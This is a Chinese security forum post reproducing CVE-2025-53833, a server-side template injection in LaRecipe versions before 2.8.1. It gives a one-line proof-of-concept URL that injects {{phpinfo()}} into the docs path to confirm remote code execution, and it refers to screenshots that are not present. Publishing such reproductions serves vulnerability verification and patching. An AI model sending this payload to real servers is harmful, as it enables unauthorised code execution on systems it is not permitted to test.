LaRecipe服务器端模板注入漏洞(CVE-2025-53833)-网络安全论坛-网络安全-阻击者联盟

LaRecipe服务器端模板注入漏洞(CVE-2025-53833)

勾八徽章-资深玩家-阻击者联盟等级-LV2-阻击者联盟41天前发布
30

0x00写在前面
      本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!

0x01漏洞介绍

d2b5ca33bd20250903195839

LaRecipe是saleem-hadad 个人开发者的一个使用MarkDown为Laravel应用程序编写和发布文档的软件。

LaRecipe 2.8.1之前版本存在安全漏洞,该漏洞源于服务器端模板注入,可能导致远程代码执行。

0x02影响版本

LaRecipe < 2.8.1

d2b5ca33bd20250903195858

0x03漏洞复现

d2b5ca33bd20250903195908

2.对漏洞进行复现

 POC 

/docs/1.0/?{{phpinfo()}}

   通过id命令执行回显,判断漏洞存在

d2b5ca33bd20250903195936

 

评分
欢迎为Ta评分
分享
请登录后发表评论

    没有回复内容

zibll子比主题
本站同款主题模板
zibll子比主题是一款漂亮优雅的网站主题模板,功能强大,配置简单。
查看详情
发布帖子
在手机上浏览此页面